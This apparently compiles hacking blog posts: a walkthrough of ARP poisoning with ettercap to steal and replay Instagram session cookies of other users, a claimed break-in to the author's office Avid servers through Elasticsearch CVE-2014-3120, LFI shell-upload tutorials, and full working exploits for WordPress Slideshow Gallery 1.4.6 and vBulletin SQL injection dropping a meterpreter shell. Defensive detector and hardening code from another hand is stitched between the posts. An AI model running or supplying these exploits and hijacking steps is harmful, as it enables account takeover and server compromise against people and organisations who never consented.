First of all, connect to the access point that you want to sniff.

Open ettercap.


Click "Sniff => Unified Sniffing".


Choose your interface. In this case I use "en0".


Now we scan all hosts in the network with the shortcut "ctrl+s" or by clicking "Hosts => Scan for hosts".


Look at the box below; it will show you the hosts that are alive.


Now show the hosts list by clicking "Hosts => Hosts list" or just pressing "H".


Add the gateway into Target 1. In this case the gateway is 192.168.0.1.
Select the gateway IP address and click "Add to Target 1".
As you can see below, 192.168.0.1 has been added to TARGET1.


Add the rest of the clients to Target 2.
Select all the clients and click "Add to Target 2".


Now start the MITM attack (ARP Poisoning).


Tick the option "Sniff remote connections" and click OK.


Start the sniffing by clicking "Start => Start sniffing".


Open Wireshark to capture packets.


Click "Interface List" to choose your interface.
My interface is "en0"; select it and click "Start".


Let Wireshark capture packets for a while.
Filter the packets with "http.cookie" to see the clients' cookies.


I have clients who open the Instagram app on an iPhone.
I can see the username igfl=blablabla (the one that I blurred).
As we can see, we have the Instagram cookie now.


In order to paste this cookie into the browser, you need to install the Greasemonkey plugin plus Cookie Injector in Firefox (right corner).


Right-click on the "Request URI", choose "Copy => Value" and paste it into Firefox.


The page will look like this because you are not logged in ({"status":"fail","message":"login_required"}).


When I open the target's Instagram on my phone, the user is private.



Now copy the Instagram cookie from Wireshark.
Right-click on "Cookie:", choose "Copy => Bytes => Printable Text Only".


Paste the "Wireshark Cookie Dump" into Firefox by pressing "alt+c".


Refresh the page and you will see what looks like a line of code, but it isn't. It's the Instagram user's data.
We are now logged in to Instagram.


Here is the profile page. As you can see on the right, I now have access to her Instagram.


Happy sniffing guys.. :))
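Added example, not part of the original post and not ettercap or Wireshark code: a small ARP-poisoning detector in Python. The Target 1 / Target 2 poisoning above leaves two traces that any host on the LAN can see without special tools: the gateway IP suddenly resolving to a different MAC, and one MAC answering for the gateway and for the clients at the same time. The ARP replies below are constructed for this example and stand in for a packet capture or periodic ARP-table snapshots.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"  # the gateway the post puts in Target 1

# Constructed ARP replies as (sender IP, sender MAC). The first three are the
# honest state of the LAN; the last three imitate one extra host answering for
# the gateway and for both clients, which is what the Target 1 / Target 2
# poisoning above produces.
SAMPLE_REPLIES = [
    ("192.168.0.1", "00:11:22:33:44:01"),
    ("192.168.0.10", "00:11:22:33:44:10"),
    ("192.168.0.11", "00:11:22:33:44:11"),
    ("192.168.0.1", "aa:bb:cc:dd:ee:ff"),
    ("192.168.0.10", "aa:bb:cc:dd:ee:ff"),
    ("192.168.0.11", "aa:bb:cc:dd:ee:ff"),
]


def detect_arp_poisoning(replies, gateway_ip=GATEWAY_IP):
    """Return alert strings for an (ip, mac) reply sequence; [] means nothing seen."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        # An IP that changes owner mid-session is the first symptom; flag the
        # gateway separately because that is the entry usually poisoned.
        if previous is not None and previous != mac:
            label = "GATEWAY" if ip == gateway_ip else "host"
            alerts.append("%s %s moved from %s to %s" % (label, ip, previous, mac))
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
    # One MAC answering for the gateway and for clients is the signature of a
    # full-duplex ARP MITM such as ettercap's; a router that legitimately owns
    # several addresses would not be claiming the client IPs.
    for mac, ips in sorted(mac_to_ips.items()):
        if gateway_ip in ips and len(ips) > 1:
            alerts.append("%s answers for %d addresses including the gateway" % (mac, len(ips)))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print("ALERT:", alert)
```

Spotting the poisoning is the cheap half; a static ARP entry for the gateway on the clients, or dynamic ARP inspection on the switch, stops it, and the cookie theft that follows only works because the Instagram session above travelled over plain HTTP.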

Well, since my office uses the Avid system as their broadcast system, I tried to hack into the system and it works. Actually, this vulnerability is not in the Avid system but in Elasticsearch (CVE-2014-3120). This vulnerability affects the Avid system and it is a high-risk vulnerability. Avid still uses the vulnerable Elasticsearch application.

Here is the proof of concept.

An attacker can execute commands to read files on the server.


Here is the exploit to read files on the servers.


Here is the Metasploit screenshot showing how I got a shell on the Avid servers using the ElasticSearch Dynamic Script Arbitrary Java Execution module.


Pwnd. :)
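Added example, not Avid's or Elasticsearch's code: a check a defender can run against an Elasticsearch 1.x node's elasticsearch.yml for the setting behind CVE-2014-3120. The bug is reachable because dynamic scripting was enabled by default before Elasticsearch 1.2.0 and the HTTP API listened on the network; the two sample configurations are constructed for this example, and the parser only handles the flat "key: value" lines that file uses.

```python
# Constructed elasticsearch.yml fragments for an Elasticsearch 1.x node (not Avid's real config).
VULNERABLE_CONFIG = """\
cluster.name: broadcast-cluster
node.name: ingest-01
# script.disable_dynamic is not set: before 1.2.0 that means dynamic scripting is ON
network.host: 0.0.0.0
http.port: 9200
"""

HARDENED_CONFIG = """\
cluster.name: broadcast-cluster
node.name: ingest-01
script.disable_dynamic: true
network.host: 127.0.0.1
http.port: 9200
"""

LOOPBACK_HOSTS = ("127.0.0.1", "localhost", "_local_")


def parse_flat_yaml(text):
    """Read the flat 'key: value' lines elasticsearch.yml uses; comments and blank
    lines are skipped (nested YAML is not handled, which is enough for this audit)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_dynamic_scripting(config_text):
    """Return findings for the CVE-2014-3120 exposure; an empty list means hardened."""
    settings = parse_flat_yaml(config_text)
    findings = []
    # Missing key == the pre-1.2 default (enabled), so treat absence as 'false'.
    if settings.get("script.disable_dynamic", "false").lower() != "true":
        findings.append("dynamic scripting is enabled: set script.disable_dynamic: true "
                        "or upgrade to 1.2+ where it is disabled by default")
    host = settings.get("network.host", "")
    if host not in LOOPBACK_HOSTS:
        findings.append("HTTP API reachable on %s: bind network.host to loopback or firewall port %s"
                        % (host or "all interfaces", settings.get("http.port", "9200")))
    return findings


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_dynamic_scripting(cfg) or ["OK"])
```

Disabling dynamic scripts removes the script-execution path the Metasploit module uses; keeping port 9200 off untrusted networks matters regardless of version, since the REST API itself has no authentication.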



If people from Avid see this post, please fix this vulnerability ASAP. This system costs a lot of money.

Thank You!

/eof


This is a video tutorial about uploading a PHP shell to a target using the php://input wrapper.
An old video, but it still works.

The tools needed for this trick are Live HTTP Headers and Tamper Data from Mozilla Add-ons.
You can download the video here.

Thanks for downloading and watching.. :)


Here is my video tutorial about LFI injection using /proc/self/environ.
This is an old trick, but it still works.
For a better view, open the HTML file in your browser.
You can download it here.
Tools: Mozilla Firefox & the Tamper Data plugin.
Thanks for watching.. :)
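Added example covering both videos above (the php://input upload and the /proc/self/environ trick); it is not from the videos and the log lines are constructed. Both tricks leave the same fingerprint in the web server's access log: an include parameter carrying a PHP stream wrapper, a /proc pseudo-file or a traversal sequence, and, for /proc/self/environ, PHP code in a request header, because that file reflects the headers the server received. The scanner parses Apache/Nginx combined-format lines and reports the offending requests with the client IP.

```python
import re
from urllib.parse import unquote

# Constructed access log lines in combined format; 10.0.0.9 plays the tester
# from the videos, the first line is ordinary traffic.
ACCESS_LOG = """\
10.0.0.5 - - [12/Sep/2014:10:01:02 +0700] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2014:10:01:07 +0700] "POST /index.php?page=php://input HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Sep/2014:10:01:15 +0700] "GET /index.php?page=../../../../proc/self/environ HTTP/1.1" 200 1900 "-" "<?php echo 1; ?>"
10.0.0.9 - - [12/Sep/2014:10:01:20 +0700] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1320 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

# Stream wrappers and pseudo-files that turn a local include into code execution,
# plus directory traversal. Leftmost match wins, so '../' is reported when it
# precedes '/proc/self/environ' in the same value.
INCLUSION_RE = re.compile(r"(php://|/proc/self/environ|\.\./)", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?php", re.IGNORECASE)


def scan_access_log(text):
    """Return one dict per suspicious request: ip, time, decoded path, status, reasons."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # Decode twice: traversal sequences are often URL-encoded, sometimes twice.
        path = unquote(unquote(m.group("path")))
        reasons = []
        found = INCLUSION_RE.search(path)
        if found:
            reasons.append("inclusion pattern %r in request path" % found.group(1))
        # /proc/self/environ reflects request headers, so PHP in a header is the tell.
        if PHP_TAG_RE.search(m.group("ua")) or PHP_TAG_RE.search(m.group("referer")):
            reasons.append("PHP tag in request header")
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"), "path": path,
                         "status": m.group("status"), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(ACCESS_LOG):
        print(hit["ip"], hit["time"], hit["path"], "; ".join(hit["reasons"]))
```

A 200 status next to these paths means the include went through; on the application side the fix is an allowlist of includable page names rather than passing the parameter to include(), and on the PHP side allow_url_include stays off.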


WordPress Slideshow Gallery 1.4.6 suffers from a shell upload vulnerability.
Bug found by Claudio Viviani.
This bug is from last month, but I think there are more targets because it's WordPress. :)

Description
Feature content in beautiful and fast JavaScript powered slideshow gallery showcases on your WordPress website. You can easily display multiple galleries throughout your WordPress website displaying your custom added slides, slide galleries or showing slides from WordPress posts/pages. The slideshow is flexible, all aspects can easily be configured and embedding/hardcoding the slideshow gallery is a breeze.
Here is the exploit and how to use it. The exploit is written in Python.
You can download it here.
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management slide
# 2) python's httplib2 lib
#    Installation: pip install httplib2
#
# Usage:
#
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php
# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php
#
# Backdoor Location:
#
# http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php
#
# Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0
#

# http connection
import urllib, httplib2, sys, mimetypes
# Args management
import optparse
# Error management
import socket, httplib
# file management
import os, os.path


# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url


# Check that the file exists and is readable
def checkfile(file):
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print '[X] ' + file + ' file is missing or not readable'
        sys.exit(1)
    else:
        return file


# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'


# Create multipart body for the slide "save" form
def create_body_sh3ll_upl04d(payloadname):

    getfields = dict()
    getfields['Slide[id]'] = ''
    getfields['Slide[order]'] = ''
    getfields['Slide[title]'] = 'h0m3l4b1t'
    getfields['Slide[description]'] = 'h0m3l4b1t'
    getfields['Slide[showinfo]'] = 'both'
    getfields['Slide[iopacity]'] = '70'
    getfields['Slide[type]'] = 'file'
    getfields['Slide[image_url]'] = ''
    getfields['Slide[uselink]'] = 'N'
    getfields['Slide[link]'] = ''
    getfields['Slide[linktarget]'] = 'self'
    getfields['Slide[title]'] = 'h0m3l4b1t'

    payloadcontent = open(payloadname).read()

    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
    CRLF = '\r\n'

    L = []
    for (key, value) in getfields.items():
        L.append('--' + LIMIT)
        L.append('Content-Disposition: form-data; name="%s"' % key)
        L.append('')
        L.append(value)

    L.append('--' + LIMIT)
    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))
    L.append('Content-Type: %s' % get_content_type(payloadname))
    L.append('')
    L.append(payloadcontent)
    L.append('--' + LIMIT + '--')
    L.append('')
    body = CRLF.join(L)
    return body


# (The ASCII-art logo of the original banner did not survive extraction; the text lines are kept.)
banner = """
                        homelab.it

      W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.

      =============================================
      - Release date: 2014-08-28
      - Discovered by: Jesus Ramirez Pichardo
      - CVE: 2014-5460
      =============================================

                        Written by:

                      Claudio Viviani

                   http://www.homelab.it

                      info@homelab.it
                  homelabit@protonmail.ch

              https://www.facebook.com/homelabit
                 https://twitter.com/homelabit
             https://plus.google.com/+HomelabIt1/
    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                       help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                       )
commandList.add_option('-f', '--file', action="store",
                       help="Insert file name, ex: shell.php",
                       )
commandList.add_option('-u', '--user', action="store",
                       help="Insert Username",
                       )
commandList.add_option('-p', '--password', action="store",
                       help="Insert Password",
                       )
commandList.add_option('--timeout', action="store", default=10, type="int",
                       help="[Timeout Value] - Default 10",
                       )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.user or not options.password or not options.file:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
username = options.user
pwd = options.password
timeout = options.timeout

print(banner)

url_login_wp = host + '/wp-login.php'
url_admin_slideshow = host + '/wp-admin/admin.php?page=slideshow-slides&method=save'

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)

# Wordpress login POST Data
body = {'log': username,
        'pwd': pwd,
        'wp-submit': 'Login',
        'testcookie': '1'}
# Wordpress login headers with Cookie
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'Content-type': 'application/x-www-form-urlencoded',
           'Cookie': 'wordpress_test_cookie=WP+Cookie+check'}
try:
    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))
    # A failed login only sets the test cookie; a successful one sets several
    if len(response['set-cookie'].split(" ")) < 4:
    #if 'httponly' in response['set-cookie'].split(" ")[-1]:
        print '[X] Wrong username or password'
        sys.exit()
    else:
        print '[+] Username & password ACCEPTED!\n'

        # Create cookie for admin panel
        if 'secure' in response['set-cookie']:
            c00k13 = response['set-cookie'].split(" ")[6] + ' ' + response['set-cookie'].split(" ")[0] + ' ' + response['set-cookie'].split(" ")[10]
        else:
            c00k13 = response['set-cookie'].split(" ")[5] + ' ' + response['set-cookie'].split(" ")[0] + ' ' + response['set-cookie'].split(" ")[8]

        bodyupload = create_body_sh3ll_upl04d(payloadname)

        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
                   'Cookie': c00k13,
                   'content-type': content_type,
                   'content-length': str(len(bodyupload))}
        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)

        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:
            print '[!] Shell Uploaded!'
            print '[+] Check url: ' + host + '/wp-content/uploads/slideshow-gallery/' + payloadname.lower() + ' (lowercase!!!!)'
        else:
            print '[X] The user can not upload files or plugin fixed :((('
except socket.timeout:
    print('[X] Connection Timeout')
    sys.exit(1)
except socket.error:
    print('[X] Connection Refused')
    sys.exit(1)
except httplib.ResponseNotReady:
    print('[X] Server Not Responding')
    sys.exit(1)
except httplib2.ServerNotFoundError:
    print('[X] Server Not Found')
    sys.exit(1)
except httplib2.HttpLib2Error:
    print('[X] Connection Error!!')
    sys.exit(1)
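Added example, not the plugin's PHP and not part of the exploit above: the server-side check the vulnerable "save slide" handler was missing. The exploit works because the plugin keeps the client's file name (sh33l.php) and writes it under wp-content/uploads, where the web server executes it. The check below, in Python with constructed names and byte samples, accepts a slide only when the extension is on an image allowlist, the content starts with that image type's magic bytes and carries no PHP tag, and it regenerates the stored name so no client-chosen name (including double extensions like slide.php.jpg or a path prefix) reaches the web root.

```python
import os
import secrets
import tempfile

# Magic bytes for the image types a slideshow should accept (constructed allowlist).
ALLOWED_IMAGE_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Constructed sample upload: a minimal JPEG header padded with zeros.
JPEG_SAMPLE = b"\xff\xd8\xff\xe0" + b"\x00" * 16


def check_slide_upload(filename, content):
    """Return (accepted, detail): detail is the extension when accepted, else the reason."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be <name>.<ext> with a single extension"
    ext = parts[1]
    magic = ALLOWED_IMAGE_MAGIC.get(ext)
    if magic is None:
        return False, "extension .%s is not an allowed image type" % ext
    if not content.startswith(magic):
        return False, "content is not a %s image" % ext
    # Defence in depth: a valid image with PHP inside is still not a slide.
    if b"<?php" in content:
        return False, "image carries embedded PHP code"
    return True, ext


def store_slide(filename, content, upload_dir):
    """Write an accepted slide under a random server-chosen name and return that name."""
    accepted, detail = check_slide_upload(filename, content)
    if not accepted:
        raise ValueError(detail)
    stored = "%s.%s" % (secrets.token_hex(8), detail)
    with open(os.path.join(upload_dir, stored), "wb") as fh:
        fh.write(content)
    return stored


def demo():
    """Store the sample JPEG in a temporary directory; returns (stored name, file exists)."""
    upload_dir = tempfile.mkdtemp()
    name = store_slide("banner.jpg", JPEG_SAMPLE, upload_dir)
    return name, os.path.isfile(os.path.join(upload_dir, name))


if __name__ == "__main__":
    for fname, data in [("banner.jpg", JPEG_SAMPLE), ("sh33l.php", b"<?php echo 1; ?>"),
                        ("slide.php.jpg", JPEG_SAMPLE), ("fake.png", b"<?php echo 1; ?>")]:
        print(fname, check_slide_upload(fname, data))
    print(demo())
```

On a site that cannot patch the plugin immediately, the same outcome is reached at the web-server layer by refusing to execute scripts under wp-content/uploads, since nothing legitimate in that directory should ever run.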


In this tutorial, I will show you how to use the AOL Desktop software (version 9.1) as a Virtual Private Network (VPN).

First, download AOL Desktop 9.1. Search on Google to download it.

Register a new email account on mail.aol.com.

After the download, install AOL Desktop 9.1.

Let me check my IP address first. I have an Indonesian IP address.


Open AOL 9.1 and click Connect Options.


Then click Advanced Broadband Settings.


Click Continue.


AOL Setup will pop up; choose the Broadband tab and click Add a Broadband Profile.


Fill in the Profile Name, for example aolvpn or whatever you like, and click Add.


On Connection Type choose Home Network and click Save.


If AOL Desktop asks for a username and password, fill in the ones that you created before.
On Connection, choose the Profile Name that you created. In this case my Profile Name is aolvpn.


Logging in to AOL...


Successfully connected to AOL.


Check my IP address again.. It's changed now! Yay..


Well, that's all.. :)
Let me know if you guys have trouble with this.. Safe browsing, folks!


  1. vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server.
  2. This vulnerability was found by oststrom. Here is the exploit code.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
@author: tintinweb 0x721427D8
'''
import urllib2, cookielib, urllib, json, hashlib


class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self, baseurl, params, debuglevel=1):
        self.cookies = cookielib.LWPCookieJar()
        handlers = [
            urllib2.HTTPHandler(debuglevel=debuglevel),
            urllib2.HTTPSHandler(debuglevel=debuglevel),
            urllib2.HTTPCookieProcessor(self.cookies)
        ]
        self.browser = urllib2.build_opener(*handlers)
        self.baseurl = baseurl
        self.params = params

    def call(self, path="", data={}):
        assert(isinstance(data, dict))
        data = urllib.urlencode(data)
        req = urllib2.Request("%s%s" % (self.baseurl, path), data)
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        return self.browser.open(req)

    def call_json(self, path=None, data={}):
        try:
            x = self.call(path, data).read()
            print "raw_response", x
            resp = json.loads(x)
        except urllib2.HTTPError, he:
            resp = he.read()
        return resp

    def vb_init_api(self):
        params = {'api_m': 'api_init'}
        params.update(self.params)
        data = self.call_json("?%s" % (urllib.urlencode(params)))
        self.session = data
        return data

    def vb_call(self, params):
        api_sig = self._vb_build_api_sig(params)
        req_params = self._vb_build_regstring(api_sig)
        params.update(req_params)
        data = self.call_json("?%s" % (urllib.urlencode(params)), data=params)
        if not isinstance(data, dict):
            return data
        if 'errormessage' in data['response'].keys():
            raise Exception(data)
        return data

    def _ksort(self, d):
        ret = []
        for key, value in [(k, d[k]) for k in sorted(d.keys())]:
            ret.append("%s=%s" % (key, value))
        return "&".join(ret)

    def _ksort_urlencode(self, d):
        ret = []
        for key, value in [(k, d[k]) for k in sorted(d.keys())]:
            ret.append(urllib.urlencode({key: value}))
        return "&".join(ret)

    def _vb_build_api_sig(self, params):
        # vBulletin API signature: md5 over the sorted request string and the session secrets
        apikey = self.params['apikey']
        login_string = self._ksort_urlencode(params)
        access_token = str(self.session['apiaccesstoken'])
        client_id = str(self.session['apiclientid'])
        secret = str(self.session['secret'])
        return hashlib.md5(login_string + access_token + client_id + secret + apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
        params = {
            'api_c': self.session['apiclientid'],
            'api_s': self.session['apiaccesstoken'],
            'api_sig': api_sig,
            'api_v': self.session['apiversion'],
        }
        return params


if __name__ == "__main__":
    TARGET = "http://192.168.220.131/vbb4/api.php"
    APIKEY = "4FAVcRDc"
    REMOTE_SHELL_PATH = "/var/www/myShell.php"
    TRIGGER_URL = "http://192.168.220.131/myShell.php"
    DEBUGLEVEL = 0  # 1 to enable request tracking

    ### 2. sqli - simple - write outfile
    print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
    params = {'clientname': 'fancy_exploit_client',
              'clientversion': '1.0',
              'platformname': 'exploit',
              'platformversion': '1.5',
              'uniqueid': '1234',
              'apikey': APIKEY}
    x = Exploit(baseurl=TARGET, params=params)

    vars = x.vb_init_api()
    print vars
    '''
    x.vb_call(params={'api_m':'breadcrumbs_create',
                      'type':'t',
                      #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
                      'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
                      })

    print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
    '''
    ### 3. sqli - put meterpreter shell and trigger it
    print "[ 3 ] - sqli - meterpreter shell + trigger"
    with open("./meterpreter_bind_tcp") as f:
        shell = f.read()
    shell = shell.replace("", "")  # cleanup tags
    shell = shell.encode("base64").replace("\n", "")  # encode payload
    shell = "" % shell  # add decoderstub
    shell = "0x" + shell.encode("hex")  # for mysql outfile

    x.vb_call(params={'api_m': 'breadcrumbs_create',
                      'type': 't',
                      'conceptid': "1 union select %s into OUTFILE '%s'" % (shell, REMOTE_SHELL_PATH)})
    print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
    print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST= E"
    print "[ *] shell active ... waiting for it to die ..."
    print urllib2.urlopen(TRIGGER_URL)
    print "[ ] shell died!"
    print "-- quit --"
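Added example, not vBulletin's code and not part of the exploit above: the defect the exploit relies on is that the conceptid parameter of breadcrumbs_create is pasted straight into SQL, so a UNION in the parameter is executed by the database. The block shows a lookup of that kind in its vulnerable form beside the hardened one, in Python with sqlite3 and a constructed schema (sqlite has no INTO OUTFILE, so the injected UNION pulls a value from another table instead of writing a file, but the fault and the fix are the same).

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the forum database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE thread (threadid INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE user (userid INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO thread VALUES (1, 'Welcome'), (2, 'Rules');
        INSERT INTO user VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn


def breadcrumb_title_vulnerable(conn, conceptid):
    """The pattern behind the exploit: the id is formatted into the query text,
    so '1 union select ...' becomes part of the SQL and is executed."""
    sql = "SELECT title FROM thread WHERE threadid = %s" % conceptid
    return [row[0] for row in conn.execute(sql).fetchall()]


def breadcrumb_title_hardened(conn, conceptid):
    """Two independent barriers: validate the type the API documents (an integer
    id), and bind the value as a parameter so the driver never treats it as SQL.
    Returns None for an invalid id; the API layer turns that into its error reply."""
    try:
        ident = int(str(conceptid).strip(), 10)
    except ValueError:
        return None
    sql = "SELECT title FROM thread WHERE threadid = ?"
    return [row[0] for row in conn.execute(sql, (ident,)).fetchall()]


if __name__ == "__main__":
    db = make_db()
    injected = "1 union select password from user"
    print("vulnerable, normal id:", breadcrumb_title_vulnerable(db, "1"))
    print("vulnerable, injected :", breadcrumb_title_vulnerable(db, injected))
    print("hardened, normal id  :", breadcrumb_title_hardened(db, "1"))
    print("hardened, injected   :", breadcrumb_title_hardened(db, injected))
```

Parameter binding alone would already defeat the UNION; the integer check is kept because it also gives the API a clean error instead of a database error, which is the same response a probing client would otherwise use to tell injectable parameters from safe ones. FILE privilege for the database account, which the INTO OUTFILE step needs, is the other thing to remove.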